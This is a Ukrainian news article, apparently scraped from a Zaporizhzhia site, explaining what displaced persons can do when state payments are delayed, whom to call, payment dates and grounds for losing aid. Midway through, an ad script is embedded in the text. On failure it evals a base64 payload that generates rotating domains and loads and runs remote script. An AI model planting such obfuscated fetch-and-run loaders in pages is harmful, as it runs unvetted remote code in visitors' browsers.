Що робити, коли не надійшли виплати ВПО: корисна інформація для переселенців

В Україні продовжують діяти виплати для внутрішньо переміщених осіб (ВПО). Тобто українці, які вимушені були покинути домівки через війну, у 2023 році продовжують отримувати державну допомогу.

Рік тому, у березні 2022 року, Міністерство економіки повідомило, що для підтримки внутрішньо переміщених осіб на території України передбачена щомісячна допомога від держави. Грошові виплати передбачають:

2 тис. грн для осіб від 18 років;3 тис. грн для дітей (до 18 років) та осіб з інвалідністю.

Ці виплати здійснюють щомісячно, проте українці зі статусом ВПО скаржаться на тривалі затримки. Факти ICTV дізнавалися, куди телефонувати та звертатися, якщо на картку не приходять виплати ВПО.

Не приходять виплати для ВПО: куди телефонувати та що робити

Перше, що варто зробити, це не панікувати! Виплати дійсно можуть затримуватися з технічних причин, але усі ВПО, які мають право на державну допомогу, їх обовʼязково отримають.

Якщо гроші вже мали надійти на картку, та їх досі немає, ви можете зателефонувати:

Мінреінтеграції (номер гарячої лінії 15-48);до офісу уповноваженого з питань ВПО (+38 (066) 813-62-39);звернутися у свій ЦНАП та управління соцзахисту.

Крім того, ви можете надіслати повідомлення у месенджери офіційних сторінок Мінреінтеграції та повідомити про затримки виплат.

Після особистого звернення ваші дані перевірять і надішлють кошти!

Коли чекати виплат ВПО – числа

Перерахування бюджетних коштів ВПО здійснюється Мінсоцполітики в АТ Ощадбанк щомісяця:

до 3;13;23 числа.

Натомість раз на місяць відбувається виплата на підставі реєстру внутрішньо переміщених осіб для виплати допомоги.

Чому виплати можуть затримуватись?

У Мінсоцполітики зазначають, що найголовнішою причиною затримок є технічні проблеми. Тобто всі українці, які мають право на отримання виплат, їх 100% отримають. Просто через технічні проблеми можуть відбуватися певні затримки. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Якщо виникають затримки та виплати не надходять понад місяць – це технічні проблеми, які варто усувати якнайшвидше, – зазначають у Мінсоцполітики.

У Мінсоцполітики радять особисто звертатися за номерами, які ми зазначали вгорі!

Не всі ВПО можуть отримувати грошову допомогу: хто втратить виплати

Про це розповіли фахівці «Юридичного порадника для ВПО».

Виключення зі списку територій, де ведуться бойові дії, чи тимчасово окупованих територій

Міністерство з питань реінтеграції тимчасово окупованих територій періодично оновлює список населених пунктів, на яких ведуться активні бойові дії чи які тимчасово окуповані Російською Федерацією. Наявність у переліку вашого міста чи села є підставою для нарахування грошової допомоги. Тож виключення також потягне за собою скасування виплат.

Особа не проживає за вказаною адресою

Про зміну фактичного місця проживання потрібно інформувати органи соціального захисту протягом 10 календарних днів. Якщо перевірка виявить відсутність людини за вказаною адресою, а нова не зареєстрована, то грошові виплати анулюють. Довідка внутрішньо переміщеної особи залишиться дійсною.

Людина виїхала за межі України

Перебування за кордоном понад 60 днів є підставою для анулювання фінансових нарахувань та статусу ВПО.

ВПО до 24 лютого 2022 року не мають права на кошти

Цей пункт залежить від конкретної ситуації. Передбачено, що українці, які мали статус внутрішньо переміщеної особи до початку повномасштабного вторгнення, і станом на 1 березня 2022 року отримували щомісячну адресну допомогу, можуть претендувати на нову виплату за однієї умови – вони повторно евакуювалися з окупації чи зони бойових дій.

Діти переселенців не отримують виплати

Також спірний пункт, який змінюється під впливом обставин. Загалом на дитину можна оформити довідку ВПО, але кошти доступні у випадку, коли батьки переїхали з населеного пункту в районах бойових дій або окупації після 24 лютого. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/shho-robiti-koli-ne-nadijshli-viplati-vpo-korisna-informatsiya-dlya-pereselentsiv/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top